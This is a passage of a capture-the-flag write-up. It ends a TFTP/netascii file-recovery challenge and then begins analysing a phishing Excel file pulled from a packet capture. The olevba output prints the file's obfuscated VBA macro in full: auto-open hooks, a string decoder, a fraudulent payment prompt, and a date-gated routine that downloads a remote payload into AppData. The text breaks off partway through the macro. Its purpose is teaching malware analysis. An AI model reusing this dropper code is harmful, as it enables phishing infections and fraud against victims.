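    """Constructed sample, not the challenge pcap: a PDF-like file whose encoded form puts
    a CR at byte 511 (end of block 1) and its LF at the start of block 2, plus the byte
    run 10 d0 af whose hex spelling contains a false '0d0a'."""
    original = b"%PDF-1.4\n" + b"x" * 501 + b"\n" + b"\x10\xd0\xaf\r" + b"%%EOF\n"
    wire = netascii_encode(original)
    chunks = [wire[i:i + TFTP_BLOCK_SIZE] for i in range(0, len(wire), TFTP_BLOCK_SIZE)]
    if len(wire) % TFTP_BLOCK_SIZE == 0:
        chunks.append(b"")  # TFTP ends an exact multiple of 512 with an empty block
    hex_lines = [(struct.pack(">HH", TFTP_DATA, n) + c).hex() for n, c in enumerate(chunks, 1)]
    return original, hex_lines


if __name__ == "__main__":
    original, lines = build_sample_capture()
    ok = recover_file(lines) == original
    print(len(lines), "DATA blocks;", "recovered OK" if ok else "mismatch")
```

On the sample, `naive_hex_text_decode` drops the 0xd0 byte of the second block, which is the kind of corruption that leaves the pdf unreadable.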
![image](https://hackmd.io/_uploads/HJDRUk3Pa.png)

Credit: Wikipedia

As the image shows, null = 0x00, line feed (LF) = 0x0A and carriage return (CR) = 0x0D. Any CR must be followed by either a null or an LF, which means the data was padded with an extra 0x00 or 0x0A, so the data-processing script above needs a little more code. This replaces the `file.write` line:

```python
# Decode the line to bytes first, then undo netascii (CR LF -> LF, CR NUL -> CR);
# replacing in the hex text instead could match a '0d0a' that straddles two bytes
file.write(bytes.fromhex(line).replace(b'\r\n', b'\n').replace(b'\r\x00', b'\r'))
```

With that, `flag.pdf` opens and contains the flag.

# SS2 - Under Control

- **File: NoStarWhere.pcapng**

*Description: After Hòa's malicious document sample was dissected by the analysts at Cookie Arena and mocked as too simple, Hòa decided to take a further advanced office-computing course to create a more sophisticated malware sample. He then tested the new sample by attaching it to a phishing email sent to his teacher. In the end Hòa successfully took control of his teacher's computer and even stole the upcoming final exam papers.*

Use tshark to export objects from the HTTP protocol: `tshark -r NoStarWhere.pcapng --export-object "http,./"`

The file `Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls` is trying to run some command on the system (to be safe, do this in a virtual machine), so I will use `oletools` to look at its macro.
`olevba Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls > ./macro.txt` ``` VBA MACRO Module1.vba in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub Auto_Open() Workbook_Open End Sub Sub AutoOpen() Workbook_Open End Sub Sub WorkbookOpen() Workbook_Open End Sub Sub Document_Open() Workbook_Open End Sub Sub DocumentOpen() Workbook_Open End Sub Function ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»· = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥" »¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢ = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© = InStr(¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·, Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1)) If ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© > 0 Then ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« = Mid(»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢, ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©, 1) ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + 
¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« Else ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1) End If Next ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨ = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» For ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° = 1 To Len(®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦²) ®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦² = ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° Next For ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» = 2 To Len(£©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦) £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ = 2 Next For »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· = 3 To Len(»¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸) »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ = »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· Next For ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ = 4 To Len(´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤·) ´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤· = 2 Next End Function Sub Workbook_Open() Dim ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ As Object Dim ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ As String Dim ¤¸¿º«¡¬¡°µ²¢¹¾¿¡¼²¥¾®¨¶µ»¾«º½¼»ª²¢¾ª¤»¹¬»¾»¸¤µµ°¡§¬¿§¢¥§¥£¶¢¥©¨ As String Dim §»¶¬¡¦¹³¾¸¸³££¹´´¸³¥¦´¢¹¥··£°¿²»º¶°°¥©²¢°¾ª«°©«®·½½··´®¹°µµ©½½§¥·°»¢¼¼´¡¦¡«¹ As String Dim 
¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ As Integer ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ = Chr(50) + Chr(48) + Chr(48) Set ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ = CreateObject("WScript.Shell") ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ = ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§.SpecialFolders("AppData") Dim ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ Dim ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ Dim ¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©¶ Dim ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° As Long Dim ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» As String Dim ¿¨¡©§¾¡º·¼½µ¡®¾¥¼½«¹´¥¥¶²°»¤¡·»°¬£°¿¥§¬¸©º¢¾¥·´£¹¥¡½¬¸ª´º°»§¬¥¡£¢¦»·¶ As Long Dim »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ As String Dim »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· As Long Dim ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ As String Dim °»»¦¡½º®¤¼º¬³¤³º¸¶®¨½®©µ«¢´¾´··¦«º¬º°¥²ª¹«¿º¼£º·¦¢¬°¢¾§µ²° As String Dim £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ As Long Dim ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ Dim ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ Dim ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ As Integer Dim ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² Dim ®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°© ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ = 1 
Range("A1").Value = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("4BEiàiuP3x6¿QEi³") Dim ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ As String ´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³ = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir" & vbCrLf & "ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P" & vbCrLf & "@m@m@mo@@§mmm" & vbCrLf & "g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu" & vbCrLf & "t_iI:PTtPt_iI" ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤ = ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(´¸®¢»¬«¢®¼¿¾«²¡»¦°´»·°º¥ª¡½½¤§»´ª§¥¸»®«¶¿¸¶¢³µ¶¾¿¼£²¡¾«¹¶¹§ºµº¦¶¹¦¨¸®¸§¹µ³¢£¯©¦¾·º£¼º²»¨®²¦¤¦·½»¶³) MsgBox ½¹¢²°½¢¼¬µ¥¨³¹²¡£½¬¿´¥ºµ¢ª¥°¸¢¶«µ§¥°°¤µ¸µ¾¦°¹¾¥¹»»·¡¾²°£¬¼·´©·¡·©¾³§¦¤·¶¨¹º°¹©§©££»¥¡¢¾¤, vbInformation, ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿") Dim ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª As Date Dim ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ As Date ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª = Date ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ = DateSerial(2023, 6, 6) If ¢¶¸¡³·´®¨½¥¡¼»´§²¾½º¢¿°°¹¹££©´¢©¹ª¬»¡¡°º·«¶²¦¾²¦¹º¤¹¼»«»¬º¤¸½¥¹¬²§¶°¾·»§©¥ª < ¹»«´¾¹¡º¸¿°·¶¥µ¢µ¾²¦¥§¶¨´²½°·£®·»ª¡¬¬»½µ³©·»¾¤·¹¤µ®º¤¸§¶·¢·¹º££§¬¸ Then Set ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸² = CreateObject("microsoft.xmlhttp") Set ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥ = CreateObject("Shell.Application") ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬ = 
¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ + ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("\k¿i6Ü_~Bb@") ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Open "get", ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"), False ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².send ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ = ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².responseBody If ³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸².Status = 200 Then Set ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ = CreateObject("adodb.stream") ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Open ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Type = ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Write ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.SaveToFile ³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬, ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ + ¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡ 
